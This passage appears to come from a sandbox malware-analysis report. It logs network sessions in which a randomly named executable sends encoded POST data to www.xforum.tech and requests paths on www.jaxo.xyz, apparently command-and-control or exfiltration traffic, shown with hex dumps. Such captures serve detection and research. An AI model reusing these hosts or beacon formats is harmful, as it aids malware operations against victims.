            Data Ascii: .923.277-1.338M62.906 5.209c-.447-.277-1.34-.251-1.957-.083-.279.077-.57.172-.738.298-.069.051-.108.105-.15.16-.025.038-.037.076-.038.115.043.077.042.09-.003.037-.154.243.622.357.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315
            Sep 2, 2024 09:09:12.226172924 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
            Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
            Sep 2, 2024 09:09:12.226187944 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
            Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
            Sep 2, 2024 09:09:12.230710983 CEST1236INData Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
            Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            20192.168.2.64974466.29.149.180802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:14.095223904 CEST499OUTGET /f9bc/?cLqL3H=6SLGUfBvDKizOJgilDQKzMcZwSFGn/Vi7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPB6ub3CJra4TZEe7JWrBxAEyCa2afTuvzmz4GABagNobpZHqRWtM=&rZwP=sHyxifGPIFN HTTP/1.1
            Host: www.jaxo.xyz
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Sep 2, 2024 09:09:14.697599888 CEST1236INHTTP/1.1 404 Not Found
            Date: Mon, 02 Sep 2024 07:09:14 GMT
            Server: Apache
            Content-Length: 13840
            Connection: close
            Content-Type: text/html; charset=utf-8
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
            Sep 2, 2024 09:09:14.697647095 CEST224INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
            Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify
            Sep 2, 2024 09:09:14.697694063 CEST1236INData Raw: 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20
            Data Ascii: -content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent;
            Sep 2, 2024 09:09:14.697782040 CEST1236INData Raw: 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30
            Data Ascii: 22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55
            Sep 2, 2024 09:09:14.697788954 CEST1236INData Raw: 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38
            Data Ascii: ll="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3
            Sep 2, 2024 09:09:14.697890043 CEST672INData Raw: 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63
            Data Ascii: form="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.44
            Sep 2, 2024 09:09:14.697958946 CEST1236INData Raw: 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d
            Data Ascii: 86-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.5
            Sep 2, 2024 09:09:14.697968960 CEST224INData Raw: 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d
            Data Ascii: 1.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.3
            Sep 2, 2024 09:09:14.698039055 CEST1236INData Raw: 32 35 2e 31 36 38 2e 31 32 38 2e 33 33 36 2e 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35
            Data Ascii: 25.168.128.336.247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.05
            Sep 2, 2024 09:09:14.698050022 CEST224INData Raw: 34 39 37 2e 30 37 31 2d 2e 37 2e 33 36 33 2d 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e
            Data Ascii: 497.071-.7.363-1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-
            Sep 2, 2024 09:09:14.702708006 CEST1236INData Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
            Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            21192.168.2.649745103.224.182.242802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:20.049302101 CEST752OUTPOST /647x/ HTTP/1.1
            Host: www.xforum.tech
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.xforum.tech
            Referer: http://www.xforum.tech/647x/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 211
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 38 67 68 35 75 6b 50 30 6c 55 43 6e 62 75 6b 77 39 69 2f 59 36 74 67 57 2b 57 39 42 49 34 68 47 36 31 6b 51 6f 71 74 55 4d 61 47 64 49 36 76 54 44 79 4e 65 37 65 62 4a 2b 41 4e 6d 2f 63 6f 56 53 6a 4a 74 79 67 4d 57 69 78 44 56 79 64 7a 32 6a 30 38 59 56 77 55 47 74 4f 4b 36 53 63 73 7a 5a 45 39 64 62 33 6d 68 2b 6b 73 77 66 56 6e 46 45 6b 2b 7a 64 41 6b 63 38 73 4c 2f 47 39 57 58 4e 74 64 36 36 4f 6e 79 67 4f 43 58 73 50 68 41 6e 65 64 74 6c 4a 79 44 70 76 34 4b 6d 43 66 71 65 62 38 2f 6d 68 63 6b 50 65 30 6f 7a 59 78 68 53 33 70 4f 54 74 64 79 56 73 45 4b 59 43 76 4a
            Data Ascii: cLqL3H=Ily3CeU2s+qA8gh5ukP0lUCnbukw9i/Y6tgW+W9BI4hG61kQoqtUMaGdI6vTDyNe7ebJ+ANm/coVSjJtygMWixDVydz2j08YVwUGtOK6ScszZE9db3mh+kswfVnFEk+zdAkc8sL/G9WXNtd66OnygOCXsPhAnedtlJyDpv4KmCfqeb8/mhckPe0ozYxhS3pOTtdyVsEKYCvJ
            Sep 2, 2024 09:09:20.602411032 CEST872INHTTP/1.1 200 OK
            date: Mon, 02 Sep 2024 07:09:20 GMT
            server: Apache
            set-cookie: __tad=1725260960.6248686; expires=Thu, 31-Aug-2034 07:09:20 GMT; Max-Age=315360000
            vary: Accept-Encoding
            content-encoding: gzip
            content-length: 577
            content-type: text/html; charset=UTF-8
            connection: close
            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
            Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            22192.168.2.649746103.224.182.242802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:22.599236012 CEST776OUTPOST /647x/ HTTP/1.1
            Host: www.xforum.tech
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.xforum.tech
            Referer: http://www.xforum.tech/647x/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 235
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 56 47 36 58 38 51 76 62 74 55 4e 61 47 64 47 61 76 4b 48 79 4e 72 37 65 65 38 2b 46 4e 6d 2f 63 38 56 53 69 56 74 79 58 77 56 6a 68 44 62 72 4e 7a 30 6e 30 38 59 56 77 55 47 74 4b 69 45 53 66 63 7a 5a 30 74 64 63 6d 6d 69 68 55 73 33 57 31 6e 46 41 6b 2b 33 64 41 6b 75 38 74 6e 52 47 2f 75 58 4e 73 4e 36 36 66 6e 78 71 4f 43 56 7a 66 67 71 67 62 73 49 74 61 58 30 68 4f 73 49 36 67 6a 76 62 74 39 6c 36 53 63 48 64 4f 55 71 7a 61 70 54 53 58 70 6b 52 74 6c 79 48 37 49 74 58 32 4b 71 70 59 56 57 62 62 67 6c 6e 56 57 68 58 75 59 55 55 4a 43 39 64 67 3d 3d
            Data Ascii: cLqL3H=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKVG6X8QvbtUNaGdGavKHyNr7ee8+FNm/c8VSiVtyXwVjhDbrNz0n08YVwUGtKiESfczZ0tdcmmihUs3W1nFAk+3dAku8tnRG/uXNsN66fnxqOCVzfgqgbsItaX0hOsI6gjvbt9l6ScHdOUqzapTSXpkRtlyH7ItX2KqpYVWbbglnVWhXuYUUJC9dg==
            Sep 2, 2024 09:09:23.170914888 CEST872INHTTP/1.1 200 OK
            date: Mon, 02 Sep 2024 07:09:23 GMT
            server: Apache
            set-cookie: __tad=1725260963.7901334; expires=Thu, 31-Aug-2034 07:09:23 GMT; Max-Age=315360000
            vary: Accept-Encoding
            content-encoding: gzip
            content-length: 577
            content-type: text/html; charset=UTF-8
            connection: close
            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 [TRUNCATED]
            Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            23192.168.2.649748103.224.182.242802580C:\Program Files (x86)\cwzEyCCrOjpWAazKTQfgIVrGADooCMwmRYWgBVOWNgfHMjTntcmiTbVgJ\MVaAnXtfZfwmI.exe
            TimestampBytes transferredDirectionData
            Sep 2, 2024 09:09:25.153079987 CEST1789OUTPOST /647x/ HTTP/1.1
            Host: www.xforum.tech
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en;q=0.5
            Accept-Encoding: gzip, deflate
            Origin: http://www.xforum.tech
            Referer: http://www.xforum.tech/647x/
            Cache-Control: max-age=0
            Connection: close
            Content-Length: 1247
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Data Raw: 63 4c 71 4c 33 48 3d 49 6c 79 33 43 65 55 32 73 2b 71 41 36 41 52 35 2b 7a 37 30 77 45 43 6b 58 4f 6b 77 30 43 2f 63 36 74 73 57 2b 58 34 4d 4a 4b 74 47 36 6b 30 51 73 38 5a 55 4b 61 47 64 4f 36 76 50 48 79 4e 4d 37 61 79 34 2b 46 78 70 2f 66 45 56 54 41 64 74 30 6d 77 56 73 68 44 62 6b 74 7a 33 6a 30 38 52 56 77 45 43 74 4f 47 45 53 66 63 7a 5a 32 46 64 4b 6e 6d 69 79 45 73 77 66 56 6e 5a 45 6b 2b 66 64 45 41 2b 38 74 54 76 47 4d 6d 58 44 73 39 36 35 70 62 78 69 4f 43 54 77 66 67 79 67 62 6f 62 74 61 36 50 68 4f 5a 74 36 67 58 76 62 59 77 71 6e 77 59 46 50 63 4a 4a 75 39 52 5a 56 7a 56 6a 51 72 6c 51 45 59 6f 4a 58 56 69 4f 71 4e 49 56 66 35 78 6f 6f 6a 6d 31 55 59 70 49 43 6f 79 30 65 49 6f 57 68 34 62 42 77 52 31 65 53 71 59 35 70 49 53 4b 32 4d 48 52 48 4d 65 72 52 6a 74 30 4b 77 65 39 4c 72 6e 68 6c 63 52 49 51 4d 35 6a 4a 31 4f 51 6f 46 45 77 38 62 64 72 74 56 37 2b 73 2f 56 32 6a 30 71 75 6e 47 38 6f 6a 53 30 42 57 67 44 68 64 64 73 62 65 71 71 4b 48 33 33 77 58 30 42 4f 32 62 4a 77 65 54 41 [TRUNCATED]
            Data Ascii: cLqL3H=Ily3CeU2s+qA6AR5+z70wECkXOkw0C/c6tsW+X4MJKtG6k0Qs8ZUKaGdO6vPHyNM7ay4+Fxp/fEVTAdt0mwVshDbktz3j08RVwECtOGESfczZ2FdKnmiyEswfVnZEk+fdEA+8tTvGMmXDs965pbxiOCTwfgygbobta6PhOZt6gXvbYwqnwYFPcJJu9RZVzVjQrlQEYoJXViOqNIVf5xoojm1UYpICoy0eIoWh4bBwR1eSqY5pISK2MHRHMerRjt0Kwe9LrnhlcRIQM5jJ1OQoFEw8bdrtV7+s/V2j0qunG8ojS0BWgDhddsbeqqKH33wX0BO2bJweTAdYv8Q6qCs0+mHmVYDLkjP/nxFtnNP7rJZznTpoIlL/xH8v+rYLaXVtTaRfbPor7ujW/Ww/74ci3DbAULPL/RPR9+suJ1V8P2tXkPk7XXpxY53mVXFepjo5hyy4WoDbQqJgwIZ8fIPQoA9nxjU8Y/NznwaICVZy31ijGkzM6VKfym4G3OL5IChyKmE8vvO90PE+SFV7lal0IpexaRFNfqjT4ZCLi/nx7J/Xoo3BnNh4GcF+RV8bY6PHqY6nPTal/zKLA0TLS3C0Ht9qo+eGjUGJKkWiVzCBXN0cQvvLPJZ2GjprfWHc6Zor9MHdCkKshu2z9CO2UcS+tIZ0tkVs7OAZ19J0s5MtUBjGFJmIdi/vB7EVoa5V4bN1cF2Reis8OmpZvyS4IIC8dlgZufvOVv/eGTxhdI5XlrklYKInO98Lf7Ytkj2B8oecbZpulKWh1LEBv30OgXCfV6P/mJL/aMOERO1fuut9MCKoEC8pX1KFlzkZoOODnVYS5p2yBtcKtInzvhNRbB3xdxaou4XZcjwQ/crRb52cH/fwm1FA6f+I9GDKg9FwxJyUqS1TiLTd3b1C06d+PDV7kWS0K0P6y8/WVDU95VUGg/ogpwmvtoaYcwniEuNXJDzgeH6enowb4VqL81nrvnGdoIL+UchzFaTQeepugJeKhynJ [TRUNCATED]
            Sep 2, 2024 09:09:25.781532049 CEST872INHTTP/1.1 200 OK
            date: Mon, 02 Sep 2024 07:09:25 GMT
            server: Apache
            set-cookie: __tad=1725260965.7634523; expires=Thu, 31-Aug-2034 07:09:25 GMT; Max-Age=315360000
            vary: Accept-Encoding
            content-encoding: gzip
            content-length: 577
            content-type: text/html; charset=UTF-8
            connection: close
            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e 